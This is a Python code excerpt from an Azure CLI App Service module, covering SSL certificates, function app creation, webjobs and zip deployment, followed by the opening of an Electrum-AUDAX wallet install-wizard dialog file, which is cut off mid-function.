def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode() for stdout encodings that do not support 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file):
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get')
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, cert_resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(cert_resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def _update_host_name_ssl_state(cli_ctx, resource_group_name, webapp_name, location,
host_name, ssl_state, thumbprint, slot=None):
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=location)
name = '{}({})'.format(webapp_name, slot) if slot else webapp_name
return _generic_site_operation(cli_ctx, resource_group_name, name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, client, linux=False):
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(stack, site_config):
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
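# Stacks are fetched lazily from the ARM provider: Linux stacks only carry a display name,
# while Windows stacks also carry the site-config (or app-setting) values needed to select them.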
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
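# Function app creation: a consumption plan (dynamic SKU) is identified by location, while a
# dedicated plan is referenced by name or resource id; Linux apps on a dedicated plan
# additionally get a linux_fx_version (custom image or the default functions runtime image).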
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, runtime=None, consumption_plan_location=None,
deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the OS type defaults to Windows
is_linux = os_type and os_type.lower() == 'linux'
# for a Linux consumption plan app, os_type should be Linux and a runtime must be specified;
# currently the runtime is ignored in all other cases
if is_linux and not runtime:
raise CLIError("usage error: --runtime RUNTIME required for linux functions apps with consumption plan.")
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
if consumption_plan_location:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
else:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='beta'))
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
site_config.linux_fx_version = _format_fx_version('appsvc/azure-functions-runtime')
else:
functionapp_def.kind = 'functionapp'
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
# adding app settings to the site to make it a function app
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION', value='8.11.1'))
if consumption_plan_location is None:
site_config.always_on = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully"
"created but is not active until content is published using"
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
return functionapp
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
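# Validate the storage account (it must expose blob/queue/table endpoints and use an allowed
# SKU: Standard_GRS/LRS/ZRS or Premium_LRS) and build a connection string from its first key.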
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name.value
allowed_storage_types = ['Standard_GRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
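# Poll the Kudu deployment status endpoint every 2 seconds; status 3 means the deployment
# failed, status 4 means it succeeded, and anything else after all retries raises.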
def _check_zip_deployment_status(deployment_status_url, authorization, timeout=None):
import requests
import time
total_trials = (int(timeout) // 2) if timeout else 450
for _num_trials in range(total_trials):
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization)
res_dict = response.json()
if res_dict.get('status', 0) == 3:
logger.warning("Zip deployment failed status %s", res_dict['status_text'])
break
elif res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
raise ValueError("""Deployment is taking longer than expected. Please verify
status at '{}' beforing launching the app""".format(deployment_status_url))
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
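# End-to-end create-and-deploy flow: inspect the source in the current working directory, pick
# OS/runtime/SKU defaults, then create (or reuse) the resource group, plan and app before deploying.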
def create_deploy_webapp(cmd, name, location=None, sku=None, dryrun=False): # pylint: disable=too-many-statements
import os
client = web_client_factory(cmd.cli_ctx)
# the code to deploy is expected to be in the current directory the command is running from
src_dir = os.getcwd()
# if dir is empty, show a message in dry run
    do_deployment = bool(os.listdir(src_dir))
_create_new_rg = True
_create_new_asp = True
_create_new_app = True
_set_build_appSetting = False
# determine the details for app to be created from src contents
lang_details = get_lang_from_content(src_dir)
    # we support E2E create & deploy for selected stacks; for any other stack,
    # set defaults for os & runtime and skip deployment
if lang_details['language'] is None:
do_deployment = False
        sku = sku or 'F1'
os_val = OS_DEFAULT
detected_version = '-'
runtime_version = '-'
else:
        # use the user-set SKU if provided, otherwise fall back to the language default
        if sku is None:
            sku = lang_details.get("default_sku")
language = lang_details.get("language")
is_skip_build = language.lower() == STATIC_RUNTIME_NAME
os_val = "Linux" if language.lower() == NODE_RUNTIME_NAME \
or language.lower() == PYTHON_RUNTIME_NAME else OS_DEFAULT
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
full_sku = get_sku_name(sku)
loc_name = set_location(cmd, sku, location)
    is_linux = os_val == 'Linux'
asp = "appsvc_asp_{}_{}".format(os_val, loc_name)
rg_name = "appsvc_rg_{}_{}".format(os_val, loc_name)
# Resource group: check if default RG is set
default_rg = cmd.cli_ctx.config.get('defaults', 'group', fallback=None)
_create_new_rg = should_create_new_rg(cmd, default_rg, rg_name, is_linux)
src_path = "{}".format(src_dir.replace("\\", "\\\\"))
rg_str = "{}".format(rg_name)
dry_run_str = r""" {
"name" : "%s",
"serverfarm" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"version_detected": "%s",
"version_to_create": "%s"
}
""" % (name, asp, rg_str, full_sku, os_val, location, src_path,
detected_version, runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
# create RG if the RG doesn't already exist
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
_create_new_asp = True
else:
logger.warning("Resource group '%s' already exists.", rg_name)
_create_new_asp = check_if_asp_exists(cmd, rg_name, asp, location)
# create new ASP if an existing one cannot be used
if _create_new_asp:
logger.warning("Creating App service plan '%s' ...", asp)
sku_def = SkuDescription(tier=full_sku, name=sku, capacity=(1 if is_linux else None))
plan_def = AppServicePlan(location=loc_name, app_service_plan_name=asp,
sku=sku_def, reserved=(is_linux or None))
client.app_service_plans.create_or_update(rg_name, asp, plan_def)
logger.warning("App service plan creation complete")
_create_new_app = True
else:
logger.warning("App service plan '%s' already exists.", asp)
_create_new_asp = False
_create_new_app = check_app_exists(cmd, rg_name, name)
# create the app
if _create_new_app:
logger.warning("Creating app '%s' ....", name)
create_webapp(cmd, rg_name, name, asp, runtime_version if is_linux else None)
logger.warning("Webapp creation complete")
_set_build_appSetting = True
else:
logger.warning("App '%s' already exists", name)
if do_deployment:
        # setting the app settings causes an app restart, so we avoid it if not needed
_app_settings = get_app_settings(cmd, rg_name, name)
if all(not d for d in _app_settings):
_set_build_appSetting = True
elif '"name": "SCM_DO_BUILD_DURING_DEPLOYMENT", "value": "true"' not in json.dumps(_app_settings[0]):
_set_build_appSetting = True
else:
_set_build_appSetting = False
# update create_json to include the app_url
url = _get_url(cmd, rg_name, name)
if do_deployment and not is_skip_build and _set_build_appSetting:
# setting to build after deployment
logger.warning("Updating app settings to enable build after deployment")
update_app_settings(cmd, rg_name, name, ["SCM_DO_BUILD_DURING_DEPLOYMENT=true"])
        # workaround until the timeout-limits issue for Linux is investigated & fixed:
        # wake up Kudu by making an SCM call
import time
time.sleep(5)
_ping_scm_site(cmd, rg_name, name)
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
logger.warning("Preparing to deploy %s contents to app.",
'' if is_skip_build else 'and build')
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
    # Remove the file after deployment, handling the exception if the user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
create_json.update({'app_url': url})
logger.warning("All done.")
return create_json
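# Illustrative example only (all values below are placeholders, not real output):
# with --dryrun the command returns the JSON assembled above, e.g.
#   {"name": "myapp", "serverfarm": "appsvc_asp_Linux_centralus",
#    "resourcegroup": "appsvc_rg_Linux_centralus", "sku": "FREE", "os": "Linux",
#    "location": "centralus", "src_path": "/home/me/src",
#    "version_detected": "3.7", "version_to_create": "python|3.7"}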
def _ping_scm_site(cmd, resource_group, name):
# wakeup kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization)
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum_audax.wallet import Wallet, Abstract_Wallet
from electrum_audax.storage import WalletStorage
from electrum_audax.util import UserCancelled, InvalidPassword, WalletFileException
from electrum_audax.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_audax.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum_audax.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
        for i in range(self.n):
            # QPainter.drawPie expects angles in 1/16th of a degree
            alpha = int(16 * 360 * i / self.n)
            alpha2 = int(16 * 360 * 1 / self.n)
            qp.setBrush(Qt.green if i < self.m else Qt.gray)
            qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
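# Minimal sketch of the pattern (hypothetical method, for illustration only): methods
# decorated with @wizard_dialog build their layout, run the wizard's event loop, and
# have their return value forwarded to the `run_next` callback supplied by BaseWizard;
# GoBack rewinds one step, while UserCancelled silently aborts the current step.
#
#   @wizard_dialog
#   def ask_label_dialog(self, message, run_next):
#       line = QLineEdit()
#       vbox = QVBoxLayout()
#       vbox.addWidget(WWLabel(message))
#       vbox.addWidget(line)
#       self.exec_layout(vbox, _('Label'))
#       return line.text()          # forwarded to run_next() by the decorator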
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum-AUDAX - ' + _('Install Wizard'))
self.app = app
self.config = config
        # Set for the base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
        self.refresh_gui()  # Needed for Qt on macOS.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-AUDAX wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
